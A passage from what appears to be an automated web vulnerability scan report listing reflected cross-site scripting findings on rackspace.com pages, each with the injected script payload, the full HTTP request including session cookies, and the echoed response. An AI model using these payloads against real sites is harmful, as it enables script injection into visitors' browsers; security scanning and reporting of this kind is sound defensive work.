GET /blog/?3df87"><script>alert(1)</script>8c3dc7536d=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... age-chatinvite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/blog/?3df87\"><script>alert(1)</script>8c3dc7536d=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.128. http://www.rackspace.com/blogs/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/blogs/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32034"><script>alert(1)</script>0aa11522d95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/index.php?32034"><script>alert(1)</script>0aa11522d95=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... vite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/blogs/index.php?32034"><script>alert(1)</script>0aa11522d95=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.129. http://www.rackspace.com/forms/contactsales.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/forms/contactsales.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a26f"><script>alert(1)</script>18575b301b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/contactsales.php?7a26f"><script>alert(1)</script>18575b301b2=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/contactsales.php?7a26f"><script>alert(1)</script>18575b301b2=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.130. http://www.rackspace.com/forms/contactsalesconfirmation.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/forms/contactsalesconfirmation.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c581"><script>alert(1)</script>4a0f4d57d54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/contactsalesconfirmation.php?6c581"><script>alert(1)</script>4a0f4d57d54=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/contactsalesconfirmation.php?6c581"><script>alert(1)</script>4a0f4d57d54=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.131. http://www.rackspace.com/forms/logorequest.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/forms/logorequest.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17cbb"><script>alert(1)</script>68b9e00999b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/logorequest.php?17cbb"><script>alert(1)</script>68b9e00999b=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/logorequest.php?17cbb"><script>alert(1)</script>68b9e00999b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.132. http://www.rackspace.com/forms/solutionpartnerapplication.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/forms/solutionpartnerapplication.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61bbb"><script>alert(1)</script>18701c3bf88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/solutionpartnerapplication.php?61bbb"><script>alert(1)</script>18701c3bf88=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/solutionpartnerapplication.php?61bbb"><script>alert(1)</script>18701c3bf88=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.133. http://www.rackspace.com/hosting_knowledge/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/hosting_knowledge/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab12f"><script>alert(1)</script>c842bac33c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab12f\"><script>alert(1)</script>c842bac33c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosting_knowledge/?ab12f"><script>alert(1)</script>c842bac33c5=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43306"><script>alert(1)</script>9a196529920 was submitted in the REST URL parameter 2. This input was echoed as 43306\"><script>alert(1)</script>9a196529920 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosting_knowledge/index.php43306"><script>alert(1)</script>9a196529920 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 16:00:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 X-Pingback: http://www.rackspace.com/hosting_knowledge/xmlrpc.php Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 05 Feb 2011 16:00:07 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=6; expires=Sat, 05-Feb-2011 17:00:07 GMT; path=/; domain=.rackspace.com Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 148266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/hosting_knowledge/index.php43306\"><script>alert(1)</script>9a196529920&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return false ...[SNIP]...
4.135. http://www.rackspace.com/hosting_solutions.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/hosting_solutions.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 778f4"><script>alert(1)</script>b266e48b218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosting_solutions.php?778f4"><script>alert(1)</script>b266e48b218=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/hosting_solutions.php?778f4"><script>alert(1)</script>b266e48b218=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.136. http://www.rackspace.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2667a"><script>alert(1)</script>060931ff4d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?2667a"><script>alert(1)</script>060931ff4d2=1 HTTP/1.1 Host: www.rackspace.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the noflash request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93307"><script>alert(1)</script>52822b1d737 was submitted in the noflash parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?noflash=true93307"><script>alert(1)</script>52822b1d737 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
